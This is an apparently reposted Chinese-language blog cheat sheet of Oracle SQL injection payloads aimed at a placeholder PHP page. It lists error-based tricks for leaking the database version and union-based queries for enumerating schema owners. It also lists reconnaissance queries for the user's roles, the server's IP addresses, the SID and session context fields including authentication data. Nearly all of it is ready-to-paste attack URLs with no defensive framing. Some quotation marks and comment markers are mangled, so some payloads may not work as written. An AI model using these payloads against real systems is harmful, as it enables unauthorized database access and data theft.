第一种方法http://www.xxox.cn/XXX/AA.php?id=1 and and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)-
第二种方法http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1))–
第三种方法http://www.xxox.com/XXX/AA.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))–
爆库方法一:(用 and owner<>’库名’连接)http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where rownum=1),NULL from dual–
第二个库名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and rownum=1),NULL from dual–
第三个库名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and owner<>’SYSTEM’ and rownum=1),NULL from dual–
依此类推直到返回正常页面:
爆库方法二:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=1– 分割http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=2–
有时候会重复,例如:limiti=1-10会显示同样的内容
oracle 注入信息收集
1、当前用户权限 (select * from session_roles)
2、当前数据库版本 (select banner from sys.v_$version where rownum=1)
3、服务器出口IP (用utl_http.request可以实现)
4、服务器监听IP (select utl_inaddr.get_host_address from dual)
5、服务器操作系统 (select member from v$logfile where rownum=1)
6、服务器sid (远程连接的话需要,select instance_name from v$instance;)
7、当前连接用户 (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual)
Oracle也可以用sys_context来获取基本信息
SYS_CONTEXT(‘USERENV’,’TERMINAL’) terminal,
SYS_CONTEXT(‘USERENV’,’LANGUAGE’) language,
SYS_CONTEXT(‘USERENV’,’SESSIONID’) sessionid,
SYS_CONTEXT(‘USERENV’,’INSTANCE’) instance,
SYS_CONTEXT(‘USERENV’,’ENTRYID’) entryid,
SYS_CONTEXT(‘USERENV’,’ISDBA’) isdba,
SYS_CONTEXT(‘USERENV’,’NLS_TERRITORY’) nls_territory,
SYS_CONTEXT(‘USERENV’,’NLS_CURRENCY’) nls_currency,
SYS_CONTEXT(‘USERENV’,’NLS_CALENDAR’) nls_calendar,
SYS_CONTEXT(‘USERENV’,’NLS_DATE_FORMAT’) nls_date_format,
SYS_CONTEXT(‘USERENV’,’NLS_DATE_LANGUAGE’) nls_date_language,
SYS_CONTEXT(‘USERENV’,’NLS_SORT’) nls_sort,
SYS_CONTEXT(‘USERENV’,’CURRENT_USER’) current_user,
SYS_CONTEXT(‘USERENV’,’CURRENT_USERID’) current_userid,
SYS_CONTEXT(‘USERENV’,’SESSION_USER’) session_user,
SYS_CONTEXT(‘USERENV’,’SESSION_USERID’) session_userid,
SYS_CONTEXT(‘USERENV’,’PROXY_USER’) proxy_user,
SYS_CONTEXT(‘USERENV’,’PROXY_USERID’) proxy_userid,
SYS_CONTEXT(‘USERENV’,’DB_DOMAIN’) db_domain,
SYS_CONTEXT(‘USERENV’,’DB_NAME’) db_name,
SYS_CONTEXT(‘USERENV’,’HOST’) host,
SYS_CONTEXT(‘USERENV’,’OS_USER’) os_user,
SYS_CONTEXT(‘USERENV’,’EXTERNAL_NAME’) external_name,
SYS_CONTEXT(‘USERENV’,’IP_ADDRESS’) ip_address,
SYS_CONTEXT(‘USERENV’,’NETWORK_PROTOCOL’) network_protocol,
SYS_CONTEXT(‘USERENV’,’BG_JOB_ID’) bg_job_id,
SYS_CONTEXT(‘USERENV’,’FG_JOB_ID’) fg_job_id,
SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_TYPE’) authentication_type,
SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_DATA’) authentication_data
例1:
http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((SYS_CONTEXT(‘USERENV’,'TERMINAL’)))–
例2:
http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,SYS_CONTEXT(‘USERENV’,'TERMINAL’),NULL from dual–
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/464568,如需转载请自行联系原作者